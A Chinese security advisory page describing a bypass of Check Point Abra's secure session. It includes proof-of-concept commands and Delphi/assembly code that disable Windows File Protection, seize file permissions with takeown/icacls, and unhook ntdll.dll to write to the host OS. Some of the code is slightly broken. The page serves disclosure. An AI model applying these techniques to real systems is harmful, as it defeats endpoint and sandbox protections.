首页 -> 安全研究

安全研究

安全漏洞
Check Point Abra安全限制绕过和信息泄露漏洞

发布日期:2012-07-07
更新日期:2012-07-10

受影响系统:
Check Point Software Abra
描述:
BUGTRAQ  ID: 54360

Check Point Abra可把一台普通PC变为受到全面保护的公司电脑。用户使用Abra,可随时随地、不论离线或在线,通过虚拟专用网(VPN)连接来访问公司电子邮件、文件和应用程序。Abra可在任何一台PC上自动运行,并且利用介质加密来保护U盘内的数据安全。

Check Point Abra在实现上存在安全限制绕过和信息泄露漏洞,成功利用后可允许攻击者获取敏感信息和绕过某些安全限制。

<*来源:Belov V.
        Komarov A.
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Belov V. ()提供了如下测试方法:
Komarov A. ()提供了如下测试方法:



<Execute OriginalName="calc.exe" PathName="\calc.exe" AppName="Microsoft Calculator" UIDescription="Microsoft Calculator" id="134"/>
Application Control session examines the application run only on paths, file names, as well as record VersionInfo in the file.

This implies you can import an arbitrary application and run it to bypass the control policy of applications. This is implemented by changing the file name and the field in the resource OriginalFilename VERSIONINFO on any of the white list. Moreover, the user may replace any executable file (eg archiver WinRar) to the host OS without any imports into the secure session and the file will automatically be filled in a secure session (run by the correspondences of extensions, or from the "start" menu).

It is also possible to substitute the system default software from the session "Start" menu (Internet Explorer, Notepad, Calculator, File Protection is off to the host OS, you need administrator rights). The substitution of system files can be implemented after disabling File Protection Windows File Protection with a call to the fifth ordinal of exported file system sfc_os.dll functions (windows xp), sample code:

  hInst := LoadLibrary('sfc_os.dll');
  proc := GetProcAddress(hInst, ordinal 5);
  filename := 'c:\windows\system32\calc.exe';
  asm
    push -1
    push filename
    push 0
    call proc
  end

Either by modifying the rights to the file (Vista and above):
takeown /f <&#1080;&#1084;&#1103;_&#1092;&#1072;&#1081;&#1083;&#1072;>
icacls <&#1080;&#1084;&#1103;_&#1092;&#1072;&#1081;&#1083;&#1072;> /grant %username%:F
icacls <&#1080;&#1084;&#1103;_&#1092;&#1072;&#1081;&#1083;&#1072;> /grant *S-1-1-0:(F)

It is also well executed Bat-files downloaded from the host computer?s folder called "Downloaded from PC", or any other.

The structure of the boot process and secure session:

During the secure session creates a separate process group. Executable files and libraries are the product of two assemblies 32 and 64-bit. But despite this, the 64-bit systems still run a few 32-bit modules in the X folder: \ Go \ PWC \ WoW64.

The second copy process launches the ISWMGR.exe Explorer explorer.exe processes, which is the parent of all, offered in a secure session of external tools and imported programs.

When starting the imported files in a secure session they run a separate application-boot X: \ PWC \ WOW64 \ ISWLDR.dat. He, in turn, loads the library ISWUL.dll, causing the function to set InitHook interceptions. Installed hooks calling functions for working with files, the registry, the clipboard, cryptography, etc:

HANDLE (__stdcall *__cdecl GetAddrOf_SetClipboardData())(UINT, HANDLE)
{
  HANDLE (__stdcall *result)(UINT, HANDLE); // eax@1

  result = SetClipboardData;
  addr_SetClipboardData = SetClipboardData;
  return result;
}

int __cdecl hooks_Clipboard()
{
  int v0; // eax@1
  int v1; // eax@3
  int v2; // eax@5
  int v3; // eax@7
  int result; // eax@9

  v0 = splice_func(addr_SetClipboardData, callback_SetClipboardData);
  if ( v0 )
    addr_SetClipboardData = v0;
  v1 = splice_func(addr_GetClipboardData, callback_GetClipboardData);
  if ( v1 )
    addr_GetClipboardData = v1;
  v2 = splice_func(addr_OpenClipboard, callback_OpenClipboard);
  if ( v2 )
    addr_OpenClipboard = v2;
  v3 = splice_func(addr_EmptyClipboard, callback_EmptyClipboard);
  if ( v3 )
    addr_EmptyClipboard = v3;
  result = splice_func(addr_CloseClipboard, callback_CloseClipboard);
  if ( result )
    addr_CloseClipboard = result;
  return result;
}

It is possible to bypass interceptor functions by their release (recovery of the original code functions as it was before the modification) - direct reading from a file system folder (for the use of technology before the reading system files must be copied to a temporary folder and install a structured exception handler), such as ntdll.dll, read the first 10-15 bytes of the function from the file and overwrite the buffer was read the prologue of the corresponding function in the memory (which is the function of the jump-hook, for example ZwLoadDriver).

Technique, for example, can allow making changes to files \ Registry of the secure session directly to the host system.

procedure resolve_APIs_from_dll_images(mapped_dll_base: pointer; dllname: string);
var
var_4, var_8, var_10, var_20, var_24, var_2C, var_28, var_3C, var_1C, dllbase, Src, old: DWORD;
begin
asm
  pushad
   mov     eax, [mapped_dll_base]
   mov     ecx, [eax+3Ch]
   mov     edx, [mapped_dll_base]
   lea     eax, [edx+ecx+18h]
   mov     [var_10], eax
   mov     ecx, [var_10]
   mov     edx, [mapped_dll_base]
   add     edx, [ecx+60h]
   mov     [var_4], edx
   mov     eax, [var_4]
   mov     ecx, [mapped_dll_base]
   add     ecx, [eax+1Ch]
   mov     [var_8], ecx
   mov     ecx, [var_4]
   mov     edx, [mapped_dll_base]
   add     edx, [ecx+20h]
   mov     [var_20], edx
   mov     eax, [var_4]
   mov     ecx, [mapped_dll_base]
   add     ecx, [eax+24h]
   mov     [var_2C], ec
   push    dllname
   call    LoadLibrary
   mov     [var_28], eax
   cmp     [var_28], 0
   jne     @loc_41D111
   jmp     @ending
@loc_41D111:
   mov     [var_24], 0
   jmp     @loc_41D135
@loc_41D11A:
   mov     eax, [var_24]
   add     eax, 1
   mov     [var_24], eax
   mov     ecx, [var_20]
   add     ecx, 4
   mov     [var_20], ecx
   mov     edx, [var_2C]
   add     edx, 2
   mov     [var_2C], edx
@loc_41D135:
   mov     eax, [var_4]
   mov     ecx, [var_24]
   cmp     ecx, [eax+18h]
   jnb     @ending
   mov     ecx, [var_24]
   mov     edx, [var_20]
   mov     eax, [mapped_dll_base]
   add     eax, [edx]
   mov     ecx, [var_24]
   mov     edx, [var_8]
   mov     eax, [var_28]
   add     eax, [edx+ecx*4]
   mov     [var_3C], eax
   mov     ecx, [var_24]
   mov     edx, [var_8]
   mov     eax, [mapped_dll_base]
   add     eax, [edx+ecx*4]
   mov     [Src], eax
   push    0Ah
   mov     ecx, [Src]
   push    ecx
   lea     edx, [Dst]
   push    edx
   call    memcpy
   add     esp, 0Ch
   lea     eax, [old]
   push    eax
   push    PAGE_EXECUTE_READWRITE
   push    0Ah
   mov     eax, [var_3C]
   push    eax
   call    VirtualProtect
   push    0Ah
   lea     ecx, [Dst]
   push    ecx
   mov     eax, [var_3C]
   push    eax
   call    memcpy
   add     esp, 0Ch
   jmp     @loc_41D11A
@ending:
  popad
end;
end;

function UnHook(dllname: string): boolean;
var
MapOffset: pointer;
dll, filename: string;
MapHandle, FileHandle: THandle;
Begin
dll := SystemDir + '\' + dllname;
filename := GetSpecialPath(CSIDL_APPDATA) + '\' + dllname;
result := CopyFile(PChar(dll), PChar(filename), false);
if result then
begin
FileHandle := CreateFile(pChar(filename), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0);
If FileHandle <> INVALID_HANDLE_VALUE then
  Try
   MapHandle := CreateFileMapping(FileHandle, nil, $1000002, 0, 0, nil);
   If MapHandle <> 0 then
    Try
     MapOffset := MapViewOfFile(MapHandle, FILE_MAP_READ, 0, 0, 0);
     If MapOffset <> nil then
      Try
        resolve_APIs_from_dll_images(MapOffset, dllname);
      Finally
       UnmapViewOfFile(MapOffset);
      End;
    Finally
     CloseHandle(MapHandle);
    End;
   Finally
    CloseHandle(FileHandle);
   End;
DeleteFile(filename);
end;
End;

procedure Write2File(filename, s: string);
var
f: textfile;
begin
  assignfile(f, filename);
  rewrite(f);
  writeln(f, s);
  closefile(f);
end;

begin
UnHook('ntdll.dll');
..
Write2File('c:\users\Administrator\Desktop\POC.txt', 'Now we writing to host OS');
end;

建议:
厂商补丁:

Check Point Software
--------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.checkpoint.com

浏览次数:2263
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障